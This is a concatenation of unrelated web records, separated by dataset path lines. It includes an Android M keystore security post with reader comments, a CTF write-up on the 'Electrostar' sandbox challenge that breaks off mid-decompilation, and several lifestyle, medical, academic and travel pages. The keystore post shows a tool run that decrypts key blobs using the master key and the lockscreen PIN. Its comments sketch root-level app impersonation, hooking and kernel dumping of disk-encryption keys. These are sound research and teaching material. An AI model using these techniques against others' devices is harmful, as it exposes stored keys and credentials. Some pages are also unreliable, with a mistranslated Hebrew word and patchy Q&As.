familiar begin/update/finish pattern. Key properties are stored as a series of tags along with the key, and form an authorization set when combined. AOSP includes a pure software reference keymaster implementation which implements cryptographic operations using OpenSSL and encrypts key blobs using a provided master key. Let's take a more detailed look at how the software implementations handles key blobs. Key blobs Keymaster v1.0 key blobs are wrapped inside keystore blobs, which are in turn stored as files in /data/misc/keystore/user_X, as before (where X is the Android user ID, starting with 0 for the primary user). Keymaster blobs are variable size and employ a tag-length-value (TLV) format internally. They include a version byte, a nonce, encrypted key material, a tag for authenticating the encrypted key, as well as two authorization sets (enforced and unenforced), which contain the key's properties. Key material is encrypted using AES in OCB mode, which automatically authenticates the cipher text and produces an authentication tag upon completion. Each key blob is encrypted with a dedicated key encryption key (KEK), which is derived by hashing a binary tag representing the key's root of trust (hardware or software), concatenated with they key's authorization sets. Finally, the resulting hash value is encrypted with the master key to derive the blob's KEK. The current software implementation deliberately uses a 128-bit AES zero key, and employs a constant, all-zero nonce for all keys. It is expected that the final implementation will either use a hardware-backed master-key, or be completely TEE-based, and thus not directly accessible from Android. The current format is quite easy to decrypt, and while this will likely change in the final M version, in the mean time you can decrypt keymaster v1.0 blobs using the keystore-decryptor tool. The program also supports key blobs generated by previous Android versions, and will try to parse (but not decrypt) encrypted RSA blobs on Qualcomm devices. Note that the tool may not work on devices that use custom key blob formats or otherwise customize the keystore implementation. keystore-decryptor takes as input the keystore's .masterkey file, the key blob to decrypt, and a PIN/password, which is the same as the device's lockscreen credential. Here's a sample invocation: $ java -jar ksdecryptor-all.jar .masterkey 10092_USRPKEY_ec_key4 1234 master key: d6c70396df7bfdd8b47913485dc0a885 EC key: s: 22c18a15163ad13f3bbeace52c361150 (254) params: 1.2.840.10045.3.1.7 key size: 256 key algorithm: EC Hidden tags: tag=900002C0 TAG_KM_BYTES bytes: 5357 (2) Enforced tags: Unenforced tags: tag=20000001 TAG_KM_ENUM_REP 00000003 tag=60000191 TAG_KM_DATE 000002DDFEB9EAF0: Sun Nov 24 11:10:25 JST 2069 tag=10000002 TAG_KM_ENUM 00000003 tag=30000003 TAG_KM_INT 00000100 tag=700001F4 TAG_KM_BOOL 1 tag=20000005 TAG_KM_ENUM_REP 00000000 tag=20000006 TAG_KM_ENUM_REP 00000001 tag=700001F7 TAG_KM_BOOL 1 tag=600002BD TAG_KM_DATE FFFFFFFFBD84BAF0: Fri Dec 19 11:10:25 JST 1969 tag=100002BE TAG_KM_ENUM 00000000 Per-key authorization As discussed in the 'New keystore APIs' section, the setUserAuthenticationRequired() method of the key parameter builder allows you to require that the user authenticates before they are authorized to use a certain key (not unlike iOS's Keychain). While this is not a new concept (system-wide credentials in Android 4.x require access to be granted per-key), the interesting part is how it is implemented in Android M. The system keystore service now holds an authentication token table, and a key operation is only authorized if the table contains a matching token. Tokens include an HMAC and thus can provide a strong guarantee that a user has actually authenticated at a given time, using a particular authentication method. Authentication tokens are now part of Android's HAL, and currently support two authentication methods: password and fingerprint. Here's how tokens are  defined: typedef enum { HW_AUTH_NONE = 0, HW_AUTH_PASSWORD = 1 << 0, } hw_authenticator_type_t; typedef struct __attribute__((__packed__)) { uint8_t version; // Current version is 0 uint64_t challenge; uint64_t user_id; // secure user ID, not Android user ID uint64_t authenticator_id; // secure authenticator ID uint32_t authenticator_type; // hw_authenticator_type_t, in network order uint64_t timestamp; // in network order uint8_t hmac[32]; } hw_auth_token_t; Tokens are generated by a newly introduced system component, called the gatekeeper. The gatekeeper issues a token after it verifies the user-entered password against a previously enrolled one. Unfortunately, the current AOSP master branch does not include the actual code that creates these tokens, but there is a base class which shows how a typical gatekeeper might be implemented: it computes an HMAC over the all fields of the hw_auth_token_t structure up to hmac using a dedicated key, and stores it in the hmac field. The serialized hw_auth_token_t structure then serves as an authentication token, and can be passed to other components that need to verify if the user is authenticated. Management of the token generation key is implementation-dependent, but it is expected that it is securely stored, and inaccessible to other system applications. In the final gatekeeper implementation the HMAC key will likely be backed by hardware, and the gatekeeper module could execute entirely within the TEE, and thus be inaccessible to Android. The low-level gatekeeper interface is part of Android M's HAL and is defined in hardware/gatekeeper.h. As can be expected, the current Android M builds do indeed include a gatekeeper binary, which is declared as follows in init.rc: service gatekeeperd /system/bin/gatekeeperd /data/misc/gatekeeper class main user system While the framework code that makes use of the gatekeepr daemon is not yet available, it is expected that the Android M keyguard (lockscreen) implementation interacts with the gatekeeper in order to obtain a token upon user authentication, and passes it to the system's keystore service via its addAuthToken() method. The fingerprint authentication module (possibly an alternative keyguard implementation) likely works in the same way, but compares fingerprint scans against a previously enrolled fingerprint template instead of passwords. Android M includes a redesigned keystore implementation which allows for fine-grained key usage control, and supports per-key authorization. The new keystore supports both symmetric and asymmetric keys, which are stored on disk as key blobs. Key blobs include encrypted key material, as well as a set of key tags, forming an authorization set. Key material is encrypted with a per-blob KEK, derived from the key's properties and a common master key. The final keystore implementation is expected to use a hardware-backed master key, and run entirely within the confines of the TEE.  Android M also includes a new system component, called the gatekeeper, which can issue signed tokens to attest that a particular user has authenticated at a particular time. The gatekeeper has been integrated with the current PIN, pattern or password-based lockscreen, and is expected to integrate with fingerprint-based authentication in the final Android M version on supported devices.  stevemorrow001 said… Hi Nikolay, First, thanks for the great posts on Android security. They are an invaluable resource for anyone developing security-conscious apps. I have a question regarding the security of the Android keystore/keychain on all recent versions of the OS. As your posts have laid out, access to keys in the keystore are defined on a per-app basis such that each app can only access its own keys. This is essentially governed by the app UID (and, as of 4.3, the user id). On your post describing the ICS keychain, you stated, "What this means in practice is that the Android key store is pretty secure for a software solution: even if you had access to a rooted device and managed to extract the key blobs, you would still need the keystore password to derive the master key." As of Jelly Bean (and now through Android M), support for hardware-backed devices has been provided, such that even on a rooted device, the key material should not be exposed (i.e., the security of the keystore is essentially defined by the security of the TE). These are direct attacks on the keychain, though. Suppose I have a device with app X installed and key K generated by app X. Suppose that the device is rooted. What prevents me from installing malicious app Y, granting it root access, and having app Y impersonate app X (i.e., run under the same UID) such that app Y can now access key K directly? This would seem to preclude any direct attack on the keystore, and instead use the OS permissions system directly to access any key in the keystore. Unknown said… Not much, really. If you can impersonate other apps (including system apps), you've successfully circumvented Android's security model. If SELinux is in enforcing mode (4.4+), simply getting UID 0 would probably not be enough to impersonate apps. That said, if you have physical access and can get root (unlocked bootloader, etc.), chances are you can also disable SELinux. Unknown said… Thanks for great sharing of Android Security internals! A small question related to example 1 above, generating and retrieving a 256-bit AES key: On a hardware-backed key storage device, can a symmetric key be extracted using the getEncoded() method of the Key - so that another part may use the secret key for encrypting/decrypting information to the device - or is the key not exportable - so that encrypt/decrypt can be preformed on the device only? Best regards Holla said… Hi Nikolay! With a kernel exploit it would still be possible to impersonate apps, or? Unknown said… I think there are number of ways to get the key if you have root access. But the most important is that you can't (or it's hard) to get key from the hardware backed storage. Example of attacks could be to hook Java or C using substrate or xposed framework, also to modify kernel. There always be a moment then the key will be in memory. But it will be always hard to copy this key somewhere into other device. Nikolay, am I right? Unknown said… TrustZone guarantees that you cannot access secure memory from Android. Unless you find a vulnerability in the TEE implementation, you cannot access the key, even though it is in physical memory at some point. Modifying the kernel doesn't help either, because the TEE is a separate OS. Unknown said… This comment has been removed by the author. Unknown said… Nikolay, you're right. I wrote my post without investigating too much. This looks like a great stuff. Quick question - I found few articles about generating key in hw keystore, but can you actually put something into it e.g private key. There's a method setEntry. Another question: then keystore gets wiped? I saw some people complaining that after changing lock from passcode to pincode causes keystore to get wiped. Thanks Sarbyn said… My app made for android 4.4.x with the standard KeyStore (with an RSA keypair) had a strange behaviour with Android M. I found that on Android M it is possible to change the keyguard type and also is possible to disable it even if a keystore is setted up. If the user disable it, my keystore is deleted without any warning (a popup for the user, but no warning to my application) and then my app become completely useless...... This is normal? Google changes the KeyStore and Keyguard behaviour? Why? This is very dangerous because if an user removes the keyguard it will also delete all the data in keystores (for example, also VPN credentials?). Unknown said… This comment has been removed by the author. Unknown said… This appears to be by design. It wasn't clearly documented before but now it is, see Also this for some more details/investigation: Anonymous said… Hi Nikolay, Thanks for great sharing, I have a problem and described here Can you guide me how to proceed further? Lukas said… Do you know if Gatekeeper is used to protect the full-disk encryption key as well? According to Google's doc, the TEE is used for FDE key derivation, but it is unclear from their description if on-device brute force attempts are possible or not. Lukas said… I think I've found the answer myself: If I understand it correctly, this means that the TEE is currently only used to prevent off-device parallelized brute-force attacks, but on-device brute forcing is only limited by the speed of the keymaster hardware implementation. Unknown said… I haven't tested with latest code, but yes, you are right. You can also dump the encryption key if you can modify the kernel. See this post for some details about an alternative implementation: Unknown said… It is however rate-limited, and will wipe after 10 or 20 unsuccessful tries. Lukas said… Thanks, very interesting! Where is that retry limit enforced? I couldn't find any reference in the cryptfs.c implementation or the keystore/keymaster docs. Is this something that can be used from Keystore userspace clients as well? Unknown said… The crypto footer only stores the number of tries. The wipe logic is in the CryptKeeper app, which is what you see when you enter the FED PIN/password on boot. hugo1997rm said… I have a problem using my sd card as internal storage but I had to reinstall the rom now I get that I have to fomatear , but I have important files will be some way to recover or lost forever Popular posts from this blog Decrypting Android M adopted storage Unpacking Android backups Using Password-based Encryption on Android
global_05_local_5_shard_00002591_processed.jsonl/40269
Language in the eye of the beholder Rachel Garman April 08, 2016 For Clara Cohen, language is all about patterns. The postdoctoral psychology researcher has been interested in linguistic patterns since she was an undergraduate learning Russian, and now, thanks to advances in technology, she can study patterns in language as they occur in real time. Through the Center for Language Science and the Language and Bilingualism Lab in the Department of Spanish, Italian and Portuguese, Cohen is using an eye-tracking device to examine the subtle differences between how English and bilingual speakers process singular and plural nouns. Although only a small faction of the larger scope of linguistics research, Cohen’s study could potentially unlock new information about how language is processed across the globe, with possible benefits for those with dyslexia and even Apple’s computerized personal assistant, Siri. Cohen suggests that for English speakers, determining whether or not a noun is plural might actually occur before a person even hears the “s” at the end of the word. In fact, there are subtle cues in the duration of singular and plural words that could help a listener predict plurality. “One pattern that people will have heard throughout their lives as they speak English is that before a plural suffix, the stem of a noun is a little bit shorter,” Cohen said. “So ‘cats’ with a suffix sounds shorter than ‘cat.’” Although English speakers have developed this fine-tuned language processing, speakers of many other languages, like Spanish, might not need to pay attention to subtle changes in duration since the article before a noun indicates whether it’s singular or plural (e.g., el for singular or los for plural). To test how quickly English and non-English speakers process plurality, Cohen monitors study participants with an eye-tracking device. The device works by shining a harmless and invisible infrared light on the subject’s eye. Based on the position of the light’s reflection, the attached optical video sensor uses an algorithm to determine the direction and duration of a subject’s gaze. For the purposes of the study, Cohen is interested in where a subject’s eye travels while listening to a speaker say a sentence with either singular or plural words.  Study participants sit in a soundproof room and watch a computer screen while wearing headphones and resting their heads on a chin rest (similar to one you’d find at the eye doctor). Four images appear on the screen — a seal, a bun, a bunny and a herd of seals. Cohen’s voice comes on through the headphones: “The man looked at the seals.” As the participant’s eyes look toward the image of the seals, the reflection of the infrared light gives the sensor real-time information on how fast the participant processed the sentence. According to Cohen, these precise calculations wouldn’t be possible without advances in technology. “Before we had eye trackers, the way we would interpret how people understood a sentence is by giving them a question like, ‘Is the last noun in this sentence singular or plural?’ And then we'd play them a sentence and have them press a button for yes or no,” Cohen said. “Based on how fast they pressed the button, we could determine whether the sentence was easier or harder to process.” Examining language through these older methods provides less informative data, as these yes-or-no questions are unable to capture information in real time. “So by determining where someone is looking as a sentence unfolds over time, we can determine at what point they figured out what was being asked of them,” Cohen said. The experiments conducted here at Penn State are only part of the puzzle — in May, Cohen will travel to Tarragona, Spain, on a National Science Foundation Partnerships for International Research (PIRE) grant to recreate the study with monolingual and bilingual Spanish participants. “Everyone who I'll be working with in Spain has taken English in high school, but the monolinguals haven't used it since and the bilinguals still use it,” Cohen said. “I'm going to be looking at whether the monolinguals are insensitive to this duration difference in Spanish. For the bilinguals, I'm interested in how quickly they can shift their awareness of cues.” Although Cohen’s study may only be a small piece of linguistics research, there are a variety of benefits that could come from the results. Aside from changing the way foreign languages are understood and taught, a possible implication is improving how automatic speech recognition systems — like Siri — process language. “Simply knowing that you have this pattern of durational differences depending on whether or not there's a suffix can help automatic speech recognition systems say, ‘This sound is a little bit longer than I expected and there's a suffix, therefore, it must be a verb and not a noun,’ Cohen said. “So this understanding of patterns of pronunciation can help improve the accuracy of automatic speech recognition.” And for those with auditory processing disorder — a condition often found in those with dyslexia, which hinders a person’s ability to hear subtle changes in pitch and duration of sounds — Cohen’s results could eventually lead to changes in how the disorder is managed. “Understanding exactly how important durational variation is in speech, whatever language you're speaking, might help people with these types of auditory processing disorders better manage the effects on their lives.” But for Cohen, one of the greatest personal benefits of the study is the thrill of uncovering more patterns in language. “Learning a foreign language has its own rules and principles,” Cohen said. “It doesn’t have to be a mystery.”  For more IT stories at Penn State, visit • A screenshot of the eye tracker's computer screen shows a seal, a bun, a bunny, and a herd of seals A sample image of what study participants see while using the eye tracker.  IMAGE: Courtesy of Clara Cohen • A computer shows a calibration screen from the eye-tracking device A computer in the lab lets Cohen calibrate the eye tracker for each participant.  IMAGE: Rachel Garman (1 of 2) (Media Contacts) Last Updated July 28, 2017
global_05_local_5_shard_00002591_processed.jsonl/40278
a verry different salad… excellent for a summery meal, for a tupper ware… u can play around with the ingredients 2 cups of elbow macaroni, cooked al diente all the following vegetables chopped… red bell pepper, cucumber, red onion, cherry tomatoes all chopped into bite sized parsley or coriander and mint leaves chopped fine olives, pickled onions, capers and gherkins salt and pepper extra virgen olive oil lemon juice salt, pepper, a pinch each of: NITU DIDIS cumin powder NITU DIDIS red chilli flakes NITU DIDIS turmeric powder mix all the ingredients for the salad make the dressing and leave dressing to sit for an hour till all the flavors INFUSE… pour over salad…toss well Leave a Reply WordPress.com Logo Google photo Twitter picture Facebook photo Connecting to %s
global_05_local_5_shard_00002591_processed.jsonl/40285
Optimization Vs. Maximization Management students are taught about optimization and maximization as two closely-linked-yet-differing approaches to the ultimate aim of profit-making in business. Optimization, teachers tell them, is the process of finding the best-possible alternative under the given constraints by maximizing the utilization of helpful factors and minimizing the usage of unhelpful factors. In other words, be effective to get the desired output without compromising efficiency — a difficult task for a manager, where the sum total of the management skills in him/her will be tested as well as put into use in order to get that best-possible outcome. On the contrary, maximization is an all-out effort to get the ‘all but none’ of the intended output without any regard for cost element, so efficiency is not a limiting factor and what matters is only effectiveness in reaping the maximum. In this blog, I will try to look at how optimization and maximization play out in our life and that what impacts they can have on our behavior. Let me try to explain what these two terms mean in our life — leave professional life. Maximization is the functional attempt prompted by psychological mooring to have all and in full. So maximization is more psychological than functional. Nothing should be left off and that everything needed to be in my pocket is the mindset behind maximization. This mindset is driven more by emotion and less by logic. Hence, maximization can easily be anyone’s baby. But to adopt the child of optimization and make it a part of your character, you need a different approach which is not a default but deliberate. Optimization is adapting to a lean and meaningful way of living, arising out of the realization that what matters the most is the usability and utility value. Let me bare the two words: I meant efficiency by ‘lean’ and effectiveness by meaningful. A dilemma that can have a lot of bearing on the way we behave in our daily life is whether to choose optimization over maximization or vice versa. By nature as well as by the seasoning from childhood, we are configured to go for maximization, instead of optimization. Maximization is more attractive than optimization because the former touches our most sensitive note — the longing for more. I will illustrate this with an example. Why do people buy new dress? Barring those who are crazy of wardrobe collections and fad-mongers, people buy new dresses when their existing dresses become unusable. Now, the question: do you discard the old, unusable dress after you get new dress? An honest answer from many will be a NO. Why is such an answer? Because people, by nature, want to maximize, not optimize, their possessions. A wardrobe full of dresses gives the satisfaction of maximum although the usability of old and unusable robes is naught, besides, them giving the burden of occupying a sizable portion of the wardrobe. Do you have materials like your old books, old shoes, old combs, etc. for which you already got replacements but continued to clutter your home? Reluctance to discard the unwanted is at the heart of living with worthless things. Whether the old unusable clothes in your wardrobe or the thoughts about an unsavory incident/person, they occupy significant place in your wardrobe or on mind respectively without having any salvage value. So it is futile to keep unusable things. Discarding the unusable will free up space that will make your life leaner. For example, decluttering of unusable from your wardrobe will make available space to the extent that you might even find that a few cabinets of your wardrobe can be used for storing other things. And continuing with this, if you throw away unusable things from your home, you will find a lot of free space — making your home-space leaner — which can be put into some other meaningful use. Similarly, discarding by obliterating the unusable — so unwanted — thoughts and people from your life will unchain the space being taken by and the time spent for them, which can be used for some other meaningful purpose. Usability is a part of utility-value. Usability denotes if something is usable, but utility-value is the sum total of all tangible and intangible returns that something can offer. So the tangible part of utility-value is usability. Your wedding dress in your wardrobe can become unusable, but you might draw happiness of seeing and having it in your wardrobe. This intangible happiness is unmeasurable to say that, though unusable, you derived utility-value of happiness by having your wedding dress in your wardrobe. Similarly, there are memories of good things and good people that passed through your life. Though these memories have no usability value, you still derive the utility value of happiness from them, which can act as an impetus encouraging you to succeed further as well as do more good things. The contributions of optimization get amplified if we consider the cascading effects it creates post its adoption. Human brain has around 2.50 petabyte storage capacity — 1 petabyte = 1 million Gigabyte. So the storage capacity of human brain is a limiting factor. Hence a deliberate decision of optimizing the usage of your mental space by uncluttering the unwanted thoughts about incidents and people will give the much needed room to think about better things for your life. As stated earlier on the blog, maximization is anyone’s baby by default. It offers you the most, and in its pursuit you get cluttered with many things that bog you down. Besides, such cluttering takes away the precious, limited space on your mind or at home, which, otherwise, could have been put into meaningful use.  In other words, you miss the rewards of the beautiful concept called optimization as you go after maximization! Optimize your thoughts to utilize your space and time for a leaner and meaningful life. Optimization is the way for life! Leave a Reply WordPress.com Logo Google photo Twitter picture Facebook photo Connecting to %s %d bloggers like this:
global_05_local_5_shard_00002591_processed.jsonl/40295
Treatment for Hypoactive Sexual Desire Disorder in South Miami, FL What is HSDD The simplest way to define it is: HSDD = low libido + distress. However, sex, as we all know, is never simple. It can be complicated, especially when you’re a female who has noticed something could be off with her sex drive. Hypoactive (low) Sexual Desire Disorder (HSDD) is the most common form of female sexual dysfunction. It’s a medical condition, which is characterized by a lack of interest in sex that’s causing personal frustration or distress. What are the Causes of HSDD? Studies have shown that there is a chemical imbalance in the brain that can affect desire for women with HSDD.  In those studies, when women were exposed to sexual cues, brains with HSDD didn’t activate for the sexual experience. There is the potential that these women weren’t able to process these positive sexual experiences the same way as the women without HSDD. What are the Symptoms of HSDD? • You experience low sexual desire no matter the type of sexual activity • Your level of sexual desire of interest in sex has decreased • Your lower sexual desire or lower interest in sex is bothering you • You were satisfied in the past with your level of sexual desire or interest in sex, but no longer are It’s estimated that HSDD affects 1 in 10 women today, that’s millions of our sisters, friends, moms, and partners— yet this could very well be the first time you’re hearing about it. Somehow the most common form of female sexual dysfunction is the least talked about. If you think this could be you, talk to your healthcare provider about HSDD today. There are options! Schedule an Appointment COVID-19 Update South Florida OBGYN
global_05_local_5_shard_00002591_processed.jsonl/40305
Survivorship resources Survivorship resources I found some helpful resources on the website for Sloan Kettering Memorial Hosital that focus on survivorship. The topics inlcude sexual health, fertility, coping strategies, late effects, reducing health risks in cancer survivors, second malignanices and survivorship care plans. Here is the link: Flight 0 Kudos Post new topic Talk to a health professional Cancer Information and Support Online resources and support Caring for someone with cancer?
global_05_local_5_shard_00002591_processed.jsonl/40336
Quick Answer: What Food Items Are Allowed In Checked Luggage? Is food allowed in checked baggage? Solid food items can be transported in either your carry-on or checked baggage, while liquid or gel food items larger than 3.4 oz are not permitted in carry-on baggage and should be placed in checked baggage if possible, according to the Transportation Security Administration.. Can you bring deodorant on a plane? Is toothpaste considered a liquid? Liquids and Gels Liquids include toiletries such as shampoo, after-shave, hand or body lotion, mouthwash and liquid makeup. Toiletries often found in gel form include toothpaste, deodorant and lip balm or lipstick. … Additionally, all your bottles of liquids and gels must fit in a single 1-quart plastic bag. In Standard Screening Lane Remove the 3-1-1 liquids bag and place it in the bin. Ensure pockets are empty (keys, tissues, currency, wallets, cell phones, etc.) and remove bulky jewelry (valuable items can be placed in carry-on). Remove your shoes and place them directly on the X-ray belt. What items are not allowed in checked luggage? 8 Things You Should Never Pack in Your Checked BagNever Pack These Items in Your Checked Baggage.Matches, Lighters, E-Cigarettes, and Vaping Pens.Lithium Batteries.Certain Types of Food and Alcohol. What can I pack in my checked luggage? Liquids, gels and aerosols must be placed in containers no larger than 3.4 ounces, with all containers fitting into a single 1-quart plastic bag. Those limits don’t apply to checked bags, so pack full-size containers of shampoo, lotion, toothpaste and other restricted items in this bag. Can I put my phone charger in checked baggage? —Charge your devices before you go to the airport. —Keep chargers in your carry-on luggage, not in checked bags. —You might want to carry extra battery packs, and not the kind you put in your phone. External batteries, or juice packs, act as miniature power chargers when you can’t find a place to plug in. Can I pack shampoo in my checked luggage? Can I put watches in checked luggage? They can put the watch wherever they want. Watches are not safety relevant items (like laptop batteries) which can not be put into checked luggage. Your parents may have to declare the watch at customs and may have to pay duty or taxes on it. But that’s completely independent of what luggage they are stowed in. Where do I put my phone charger when flying? Chargers are allowed in hand carry luggage. Panic over get back to packing your stuff! You can also put phone chargers in checked hold luggage too. There are no restrictions around regular phone chargers when flying that you need to be aware of.
global_05_local_5_shard_00002591_processed.jsonl/40352
A cognitive account of the Korean morpheme-se Research output: Contribution to journalArticlepeer-review 1 Scopus citations Traditional treatments of Modern Korean consider the morpheme -se as strictly a clause combining element, similar in function to the coordinating conjunction 'and' and the adverbial conjunctives 'and then' or 'because' in English. However, the morpheme also appears in a number of postpositional opposition pairs such as ey 'to' and eyse 'from,' myen 'if/when' and myense 'while, at the same time,' ulo 'toward' and ulose 'as, in the capacity of.' And it is here that traditionalists do not recognize this instance of -se as meaningful in and of itself. That is, traditional views consider such opposition pairs as ey 'to' and eyse 'from' as simply opposite notions of goal and source, respectively, with the second member constituting a full 'chunk,' not distinctly analyzable into two separate morphemes, i.e., ey+se. This paper proposes a unified analysis of -se, both as a clausal connector as well as a bound morpheme in postpositional opposition pairs. All instances of -se will be analyzed as one and the same signal, the basic meaning of which is "groundedness." Specifically, we will demonstrate that -se with its meaning of 'groundedness,' functions to establish inclusiveness and thus to link entities to each other, to link entities to locations and/or events, and to link events to other events. Through this signal-meaning-function approach, it will be shown throughout this paper that the addition of -se, by virtue of its meaning of groundedness, serves to transfer entities and events from the domain of IRREALIS to the domain of REALIS. As such, far from being a non-existent morpheme beyond its clause-combining function, it will be shown that -se actually carries powerful semantic meaning. Original languageEnglish (US) Pages (from-to)375-392 Number of pages18 JournalLanguage Sciences Issue number4 StatePublished - Jul 1 2003 All Science Journal Classification (ASJC) codes • Language and Linguistics • Linguistics and Language Fingerprint Dive into the research topics of 'A cognitive account of the Korean morpheme-se'. Together they form a unique fingerprint. Cite this
global_05_local_5_shard_00002591_processed.jsonl/40354
Don't it make my brown eyes green? An analysis of Facebook use and romantic jealousy Nicole L. Muscanell, Rosanna E. Guadagno, Lindsay Rice, Shannon Murphy Research output: Contribution to journalArticlepeer-review 27 Scopus citations Social networking Web sites, such as Facebook, have changed the way in which people communicate online. The present study examined the relationship between jealousy and Facebook use experimentally by asking participants to imagine viewing their romantic partner's Facebook page. We varied the hypothetical privacy settings and number of photos of the couple publicly available on Facebook. Results indicated that imagined privacy settings and the presence of couple photos affected negative emotions (jealousy, anger, disgust, and hurt). Furthermore, we found sex differences indicating that women felt more intense negative emotions after thinking about the fictitious scenario than did men, particularly when evidence of infidelity was public to others. These results have implications for sex differences in jealousy and suggest that the manner in which people employ Facebook privacy settings can be negative for romantic relationships. Original languageEnglish (US) Pages (from-to)237-242 Number of pages6 JournalCyberpsychology, Behavior, and Social Networking Issue number4 StatePublished - Apr 1 2013 All Science Journal Classification (ASJC) codes • Social Psychology • Communication • Applied Psychology • Human-Computer Interaction • Computer Science Applications Fingerprint Dive into the research topics of 'Don't it make my brown eyes green? An analysis of Facebook use and romantic jealousy'. Together they form a unique fingerprint. Cite this
global_05_local_5_shard_00002591_processed.jsonl/40390
022: Why You'll Never Succeed at Holiness...On Your Own Episode Artwork 0% played 00:00 00:00 Oct 15 2018 14 mins   While reading through the book of Leviticus, what struck me is that the Israelites  had to always be aware of their state of purity or impurity. Anything could turn their otherwise clean state into an unclean one, like touching a dead animal, giving birth, or something as simple as a skin rash. It was always Israel’s responsibility to ensure that they returned back to a state where they could approach God. In Leviticus 10:10-11, God says to Aaron, “You are to distinguish between the holy and the common, and between the unclean and the clean, and you are to teach the people of Israel the statutes that the Lord has spoken to them by Moses.” It was the priest’s duty to teach the people what was considered holy and what wasn’t. Today, it seems this is a lost art. Political correctness has trampled over any talk of holy living. And the “I’m going to do me” mantra rules even in churches today. Leviticus 10:10: “And that you may make a distinction between the holy and the common, and between the unclean and the clean,” God is holy, and nothing that comes short of that holiness is to be permitted into His presence. Nothing ritually unclean must enter the Sanctuary and its precincts, for it will defile it. So it was the responsibility of the priests to make the distinction and see that it was observed. Today, we are to be responsible for making sure that we are in a state of holiness as we appear before God. Mentioned on the Show: Leviticus 10:10-11 qadash- Hebrew word for kindness Leviticus Commentary by Jay Sklar Reach Out and Chat Connect with me…  Twitter | Facebook | Instagram Ways to subscribe to Unfolding Words Help Spread the Word:
global_05_local_5_shard_00002591_processed.jsonl/40427
Hack the Vote: Electrostar 1 + 2 (and thoughts on 3) During this past weekend PFS participated in Hack the Vote 2020, a quadrennial CTF run by RPISEC. We ended up placing 2nd in the competition. During the event, I spent most of my time working on the Electrostar series of challenges, and ended up landing both parts 1 and 2. I also spent some time working on part 3, but didn’t land it before the CTF ended. Challenge Overview Electrostar consisted of a main userspace host binary and a series of small module files. You receive the challenge with the userspace and 3 module files. There are also 3 placeholder flags - two text files and one executable. The first two parts involve reading the two flag files, while the final part requires a full breakout and code execution in the context of the main machine binary. The entire challenge as-given is meant to run on Ubuntu 18.04 and a libc is also provided. Thankfully, the challenge author itszn also provided a few shell scripts to organize things. One called connect.sh connects you directly to the remote challenge with live flags, and another called serve.sh hosts a local instance of the challenge with socat on port 9000. # serve.sh chmod -r flag3.exe /usr/bin/socat -d -d TCP-LISTEN:9000,reuseaddr,fork EXEC:"timeout -sKILL 300 env ./machine modules/init_module.img.sig",pty,stderr, Part 1 We start things off by pulling apart the main machine binary in IDA. Since it comes with symbols and the challenge description is helpful, we already have a general idea that the modules are loaded and interact via some sort of IPC. But what do modules look like? struct { uint8_t signature_length; uint8_t signature[/* same length as above */]; uint8_t flags; uint8_t module_dat[0]; } module; The flags field contains only a few relevant fields, such as whether a module is the initial init_module, whether it wants an ncurses GUI (requiring some window setup/teardown), or whether it has a basic privilege level (required for hitting flag #2). Modules are mapped into memory at the fixed address 0x500000 into an RWX region. void *__fastcall map_image(const void *a1, size_t a2) void *addr; // [rsp+28h] [rbp-8h] addr = (void *)map_page; // the value of map_page is 0x500000 mmap((void *)map_page, (a2 & 0xFFFFFFFFFFFFF000LL) + 4096, 7, 50, 0, 0LL); // 7 == RWX if ( !has_gui ) printf("DEBUG: Module mapped to %p\n\x1B[0m", addr); return memcpy(addr, a1, a2); Once a module is loaded, the main sandbox provides a simple IPC handler command using pipe fds. Each process simply writes a command to its IPC pipe, where each command is a 2-byte length, a 4-byte command ID, and then message data. Modules also have the ability to send each other messages by having one module register to receive messages and another one send it, proxied through the machine itself. signed __int64 __fastcall read_ipc(struct module_t *a1) ssize_t v2; // rax unsigned __int16 len; // [rsp+12h] [rbp-1Eh] int v4; // [rsp+14h] [rbp-1Ch] unsigned __int64 i; // [rsp+18h] [rbp-18h] char *databuf; // [rsp+20h] [rbp-10h] unsigned __int64 v7; // [rsp+28h] [rbp-8h] v7 = __readfsqword(0x28u); len = 0; v4 = read(a1->pipes1, &len, 2uLL); // read command length if ( !v4 ) return 0LL; if ( !len ) return 0LL; databuf = (char *)calloc(len, 1uLL); if ( !databuf ) return 0LL; for ( i = 0LL; i < len; i += v2 ) v2 = read(a1->pipes1, &databuf[i], len - i); // read command data process_ipc(a1, databuf, len); return 1LL; Finally, module files are signed; their contents are SHA256’d and the resulting data is protected by an ECDSA signature. Inside the machine binary provided as part of the game files, we have the public key which can verify signatures, but the private key has been overwritten ("Private Key Scrubbed"). This will come up again in part 2, so I’ll touch on it more then. However, none of this is actually immediately relevant, because we don’t get direct access to these module or IPC details quite yet. Instead, when we run the ./serve.sh script and connect, we’re presented with the following interface (after some log messages) * President: Washington President: Lincoln The basic functionality of this menu lets you select one (or both) of the presidents, and then select the “Submit” option which will clear the form. The logic behind this application is in the ballot_module.img.sig module, which interfaces with the gui_module.img.sig module. Both of these are loaded by the init_module. ballot_module receives simple IPC messages from any other module and records the highest value byte in the message into a global array. It simply stores each byte sequentially in that memory region. The gui_module is more immediately interesting, because it is responsible for rendering this ncurses menu. The main body of code inside it is as follows. __int64 __fastcall sub_84E(__int64 a1) void *v1; // rax int v2; // eax __int64 v4; // [rsp+10h] [rbp-70h] __int64 v5; // [rsp+18h] [rbp-68h] __int64 v6; // [rsp+20h] [rbp-60h] __int64 v7; // [rsp+28h] [rbp-58h] void *menu_items[2]; // [rsp+30h] [rbp-50h] __int64 v9; // [rsp+40h] [rbp-40h] __int64 v10; // [rsp+48h] [rbp-38h] int v11; // [rsp+50h] [rbp-30h] int v12; // [rsp+54h] [rbp-2Ch] __int64 v13; // [rsp+58h] [rbp-28h] int v14; // [rsp+64h] [rbp-1Ch] void *menu_obj; // [rsp+68h] [rbp-18h] int i; // [rsp+70h] [rbp-10h] int v17; // [rsp+74h] [rbp-Ch] int v18; // [rsp+78h] [rbp-8h] int needs_to_vote; // [rsp+7Ch] [rbp-4h] menu_items[0] = (void *)new_item("President:", "Washington"); menu_items[1] = (void *)new_item("President:", "Lincoln"); v9 = new_item("Submit", &byte_C4F); v10 = 0LL; menu_obj = (void *)new_menu(); menu_opts_off((int)menu_obj, 1); v1 = (void *)derwin(a1, 6, 38, 3, 1); set_menu_sub(menu_obj, v1); set_menu_mark(menu_obj, " * "); box((void *)a1, 0, 0); post_menu(menu_obj); // [ A ] needs_to_vote = 1; while ( 1 ) v14 = getch(); // [ B ] if ( v14 == -1 ) switch ( v14 ) case 258: menu_driver((int)menu_obj, 515); // DOWN case 259: menu_driver((int)menu_obj, 514); // UP case 10: case 13: v13 = current_item(); v12 = item_index(); if ( v12 == 